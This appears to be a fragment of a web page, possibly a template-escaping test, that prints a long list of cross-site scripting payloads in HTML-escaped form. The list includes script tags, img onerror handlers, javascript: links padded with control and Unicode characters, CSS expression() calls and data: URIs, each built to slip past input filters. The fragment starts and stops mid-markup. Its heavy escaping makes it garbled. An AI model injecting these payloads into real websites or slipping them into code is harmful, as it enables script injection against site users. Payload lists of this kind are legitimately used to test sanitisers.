&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;P end=\\\"0\\\" &gt;\\r\\n&lt;STYLE&gt;@import\\\'%(css)s\\\';&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;a{background:url(\\\'s1\\\' \\\'s2)}@import (1);\\\');}&lt;/STYLE&gt;\\r\\n&lt;meta charset= \\\"x-imap4-modified-utf7\\\"&&&gt;&&\\r\\n\\r\\n&lt;style &gt;&lt;/style&gt;\\r\\n&lt;?xml version=\\\"1.0\\\"?&gt;&lt;html:html xmlns:html=\\\'http://www.w3.org/1999/xhtml\\\'&gt;&lt;html:script&gt;(1);&lt;/html:script&gt;&lt;/html:html&gt;\\r\\n&lt;embed code=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;embed code=(1);&gt;&lt;/embed&gt;\\r\\n&lt;embed src=%(jscript)s&gt;&lt;/embed&gt;\\r\\n&lt;frameset &gt;&lt;/frameset&gt;\\r\\n&lt;object &gt;\\r\\n&lt;embed type=\\\"image\\\" src=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG &gt;]]&lt;/C&gt;&lt;X&gt;&lt;/xml&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;a &gt;test1&lt;/a&gt;\\r\\n&lt;a &gt;test1&lt;/a&gt;\\r\\n&lt;embed width=500 height=500 code=\\\"data:text/html,\\\"&gt;&lt;/embed&gt;\\r\\n&lt;iframe srcdoc=\\\"&lt;iframe/srcdoc=&lt;img/src=''&gt;&gt;\\\"&gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";\\r\\nalert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--\\r\\n&gt;\\\"&gt;\\\'&gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;style&gt;&lt;/style\\\\x3E&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0D&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x09&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x20&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0A&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n\\\&quot;\\\&#039;`&gt;ABC&lt;div style=\\\&quot;font-family:\\\&#039;foo\\\&#039;\\\\x7Dx:expression(javascript:alert(1);/*\\\&#039;;\\\&quot;&gt;DEF \\r\\n\\\&quot;\\\&#039;`&gt;ABC&lt;div style=\\\&quot;font-family:\\\&#039;foo\\\&#039;\\\\x3Bx:expression(javascript:alert(1);/*\\\&#039;;\\\&quot;&gt;DEF \\r\\n&lt;script&gt;if(\\\&quot;x\\\\\\\\xE1\\\\x96\\\\x89\\\&quot;.length==2) { javascript:alert(1);}&lt;/script&gt;\\r\\n&lt;script&gt;if(\\\&quot;x\\\\\\\\xE0\\\\xB9\\\\x92\\\&quot;.length==2) { javascript:alert(1);}&lt;/script&gt;\\r\\n&lt;script&gt;if(\\\&quot;x\\\\\\\\xEE\\\\xA9\\\\x93\\\&quot;.length==2) { javascript:alert(1);}&lt;/script&gt;\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x3Cscript&gt;javascript:alert(1)&lt;/script&gt;\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x00script&gt;javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;\\\&#039;`&gt;&lt;\\\\x3Cimg src=xxx:x onerror=javascript:alert(1)&gt;\\r\\n\\\&quot;\\\&#039;`&gt;&lt;\\\\x00img src=xxx:x onerror=javascript:alert(1)&gt;\\r\\n&lt;script src=\\\&quot;data:text/plain\\\\x2Cjavascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;data:\\\\xD4\\\\x8F,javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;data:\\\\xE0\\\\xA4\\\\x98,javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;data:\\\\xCB\\\\x8F,javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script\\\\x20type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x3Etype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Dtype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x09type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Ctype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x2Ftype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Atype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\nABC&lt;div style=\\\&quot;x\\\\x3Aexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:expression\\\\x5C(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:expression\\\\x00(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:exp\\\\x00ression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:exp\\\\x5Cression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Aexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x09expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE3\\\\x80\\\\x80expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x84expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xC2\\\\xA0expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x80expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x8Aexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Dexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Cexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x87expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xEF\\\\xBB\\\\xBFexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x20expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x88expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x00expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x8Bexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x86expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x85expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x82expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Bexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x81expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x83expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x89expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\n&lt;a href=\\\&quot;\\\\x0Bjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Fjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xC2\\\\xA0javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x05javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE1\\\\xA0\\\\x8Ejavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x18javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x11javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x88javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x89javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x80javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x17javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x03javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Ejavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Ajavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x00javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x10javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x82javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x20javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x13javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x09javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x8Ajavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x14javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x19javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\xAFjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Fjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x81javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Djavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x87javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x07javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE1\\\\x9A\\\\x80javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x83javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x04javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x01javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x08javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x84javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x86javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE3\\\\x80\\\\x80javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x12javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Djavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Ajavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Cjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x15javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\xA8javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x16javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x02javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Bjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x06javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\xA9javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x85javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Ejavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x81\\\\x9Fjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Cjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x00:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x3A:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x09:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x0D:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x0A:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Aonerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x22onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Bonerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Donerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x2Fonerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x09onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Conerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x00onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x27onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x20onerror=javascript:alert(1)&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x3Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Djavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xEF\\\\xBB\\\\xBFjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x81javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x84javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE3\\\\x80\\\\x80javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x09javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x89javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x85javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x88javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x00javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\xA8javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x8Ajavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE1\\\\x9A\\\\x80javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Cjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x2Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xF0\\\\x90\\\\x96\\\\x9Ajavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;-javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Ajavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\xAFjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x7Ejavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x87javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x81\\\\x9Fjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\xA9javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xC2\\\\x85javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xEF\\\\xBF\\\\xAEjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x83javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x8Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xEF\\\\xBF\\\\xBEjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x80javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x21javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x82javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x86javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE1\\\\xA0\\\\x8Ejavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x20javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xC2\\\\xA0javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Bjavascript:alert(1)\\\\x0Bsrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x22javascript:alert(1)\\\\x22src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x09javascript:alert(1)\\\\x09src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x27javascript:alert(1)\\\\x27src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Ajavascript:alert(1)\\\\x0Asrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Cjavascript:alert(1)\\\\x0Csrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Djavascript:alert(1)\\\\x0Dsrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x60javascript:alert(1)\\\\x60src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x20javascript:alert(1)\\\\x20src=xxx:x /&gt;\\r\\n&lt;script\\\\x2F&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x20&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x0D&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x0A&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x0C&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x00&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x09&gt;javascript:alert(1)&lt;/script&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0B=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x00=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0C=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0D=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x20=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0A=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x09=javascript:alert(1)&gt;\\r\\n&lt;script&gt;javascript:alert(1)&lt;\\\\x00/script&gt;\\r\\n&lt;img src=# onerror\\\\x3D\\\&quot;javascript:alert(1)\\\&quot; &gt;\\r\\n&lt;input onfocus=javascript:alert(1) autofocus&gt;\\r\\n&lt;input onblur=javascript:alert(1) autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;video poster=javascript:javascript:alert(1)//\\r\\n&lt;body 